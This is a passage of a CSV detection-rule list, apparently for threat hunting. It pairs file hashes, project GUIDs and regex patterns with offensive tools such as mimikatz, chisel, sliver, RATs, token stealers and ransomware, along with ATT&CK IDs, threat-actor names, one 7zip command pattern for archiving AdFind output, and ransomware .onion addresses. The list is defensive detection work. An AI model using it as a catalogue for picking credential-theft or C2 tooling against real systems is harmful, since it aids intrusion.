tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28685"
"*6f50af68f58de6c48f47a2a00823fdbf03fb76b448d6400d7522296c26cd1f55*",".{0,1000}6f50af68f58de6c48f47a2a00823fdbf03fb76b448d6400d7522296c26cd1f55.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28688"
"*6f58574cdb2d60ccd01fb4e72d1a03de02dd4992858f8ebbb74cb40d543ebbe9*",".{0,1000}6f58574cdb2d60ccd01fb4e72d1a03de02dd4992858f8ebbb74cb40d543ebbe9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28690"
"*6f71c0c87c5593fe851b54e638e9c242e429018eee80fce80a1fd2793227bcb8*",".{0,1000}6f71c0c87c5593fe851b54e638e9c242e429018eee80fce80a1fd2793227bcb8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28693"
"*6f7204e9f37025c754fd990061bda4246aa63d13e4f9fe951c7a2871c2ecf5f5*",".{0,1000}6f7204e9f37025c754fd990061bda4246aa63d13e4f9fe951c7a2871c2ecf5f5.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","28694"
"*6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04*",".{0,1000}6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#filehash","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","28695"
"*6f80905117b3415c1a1a964d77a273402c3c80952715254b09e26d3a70fbff7c*",".{0,1000}6f80905117b3415c1a1a964d77a273402c3c80952715254b09e26d3a70fbff7c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28696"
"*6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190*",".{0,1000}6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28697"
"*6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029*",".{0,1000}6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","28698"
"*6f82b7afdaff95ea893b1dda21edf5b091a186a2ec9f2883954f8a9eba5c75fa*",".{0,1000}6f82b7afdaff95ea893b1dda21edf5b091a186a2ec9f2883954f8a9eba5c75fa.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28699"
"*6f83bb55a9762c656e90c49fd505ba79414edf22a89a4029f96a6ff784716e29*",".{0,1000}6f83bb55a9762c656e90c49fd505ba79414edf22a89a4029f96a6ff784716e29.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","28700"
"*6f86663035843349077fe85bb9b7b912b4cf9f6334df6e8da098d4750cee871c*",".{0,1000}6f86663035843349077fe85bb9b7b912b4cf9f6334df6e8da098d4750cee871c.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28701"
"*6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea*",".{0,1000}6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28702"
"*6f919785361c350dd35b21573e02f681806645c50da3e98ddc703d2efa838dd6*",".{0,1000}6f919785361c350dd35b21573e02f681806645c50da3e98ddc703d2efa838dd6.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","#filehash","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","28703"
"*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*",".{0,1000}6F99CB40\-8FEF\-4B63\-A35D\-9CEEC71F7B5F.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28706"
"*6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85*",".{0,1000}6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28710"
"*6fad3a96fe407982818ce27f73c78b8ac3b0902bd85f104dc85eef092f4186de*",".{0,1000}6fad3a96fe407982818ce27f73c78b8ac3b0902bd85f104dc85eef092f4186de.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28711"
"*6fb86b256e278c854acf21be16797fb8d774759982cd3251ffda758260dffd44*",".{0,1000}6fb86b256e278c854acf21be16797fb8d774759982cd3251ffda758260dffd44.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","28713"
"*6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4*",".{0,1000}6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28714"
"*6FC09BDB-365F-4691-BBD9-CB7F69C9527A*",".{0,1000}6FC09BDB\-365F\-4691\-BBD9\-CB7F69C9527A.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","28715"
"*6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736*",".{0,1000}6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28716"
"*6fce39600a4115976300ac936a140aa10387d0b4268bbd0cba74dd7f8775b844*",".{0,1000}6fce39600a4115976300ac936a140aa10387d0b4268bbd0cba74dd7f8775b844.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28717"
"*6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44*",".{0,1000}6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","28718"
"*6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba*",".{0,1000}6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28719"
"*6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba*",".{0,1000}6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28720"
"*6feb42af348a1747fcefa53485fa6e6254ee5ad52b7d96d9027591efee282ee5*",".{0,1000}6feb42af348a1747fcefa53485fa6e6254ee5ad52b7d96d9027591efee282ee5.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","28723"
"*6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3*",".{0,1000}6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#filehash","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","28725"
"*6ff59387bfda905c88b75b8f345bca0fd9ea0ab327da28572a4e60c8bf4e1c4d*",".{0,1000}6ff59387bfda905c88b75b8f345bca0fd9ea0ab327da28572a4e60c8bf4e1c4d.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","28726"
"*6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD*",".{0,1000}6FF9974C\-B3C6\-4EEA\-8472\-22BE6BD6F5CD.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#GUIDproject","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","28728"
"*6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F*",".{0,1000}6FFCCF81\-6C3C\-4D3F\-B15F\-35A86D0B497F.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#GUIDproject","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","28729"
"*6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0*",".{0,1000}6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28730"
"*6v4q5w7di74grj2vtmikzgx2tnq5eagyg2cubpcnqrvvee2ijpmprzqd.onion*",".{0,1000}6v4q5w7di74grj2vtmikzgx2tnq5eagyg2cubpcnqrvvee2ijpmprzqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28731"
"*6yofnrq7evqrtz3tzi3dkbrdovtywd35lx3iqbc5dyh367nrdh4jgfyd.onion*",".{0,1000}6yofnrq7evqrtz3tzi3dkbrdovtywd35lx3iqbc5dyh367nrdh4jgfyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28732"
"*7.exe a -mx3 ad.7z ad_*.txt*",".{0,1000}7\.exe\sa\s\-mx3\sad\.7z\sad_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","APT29 - Chamelgang - Karakurt - TA2101 - TRAVELING SPIDER","Exploitation tool","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","28733"
"*7002cdf8ac44f3624ad432ec91b999012b0c3c8f91ffe230b9d0b8bb534e9723*",".{0,1000}7002cdf8ac44f3624ad432ec91b999012b0c3c8f91ffe230b9d0b8bb534e9723.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28734"
"*7010b962fefc8fb879e19b1f170345478875b81748b5a146218a7b0337627060*",".{0,1000}7010b962fefc8fb879e19b1f170345478875b81748b5a146218a7b0337627060.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28736"
"*7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977*",".{0,1000}7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28737"
"*7025b5a567c2599dc85b9dc1ad4f5591d46a186f8fca1a8773a6452e238eba03*",".{0,1000}7025b5a567c2599dc85b9dc1ad4f5591d46a186f8fca1a8773a6452e238eba03.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28740"
"*7026d773b575627e0e811e1027f8959ab9a596c9e9157359c9cd69be1328bac4*",".{0,1000}7026d773b575627e0e811e1027f8959ab9a596c9e9157359c9cd69be1328bac4.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","28741"
"*70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7*",".{0,1000}70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#filehash","N/A","10","","N/A","","","","28743"
"*703eba011f882e07ae16555dbcb5c774ba822c83b2fba1918d4e807549111420*",".{0,1000}703eba011f882e07ae16555dbcb5c774ba822c83b2fba1918d4e807549111420.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28745"
"*704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563*",".{0,1000}704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28746"
"*704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18*",".{0,1000}704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28748"
"*704d20f208c792e1eb4d56521304898839f3cd69d30ad830943c8e2dbe6c85cc*",".{0,1000}704d20f208c792e1eb4d56521304898839f3cd69d30ad830943c8e2dbe6c85cc.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28751"
"*704ebc20fe0c7678a2b73d97ba6ad2945ece3a7d35ba0e0a394b629570af00ca*",".{0,1000}704ebc20fe0c7678a2b73d97ba6ad2945ece3a7d35ba0e0a394b629570af00ca.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28752"
"*70511b1931a5d27f0f44bf8a3dbfd731b318b1914e743ff9aff00d8d86a8200b*",".{0,1000}70511b1931a5d27f0f44bf8a3dbfd731b318b1914e743ff9aff00d8d86a8200b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28753"
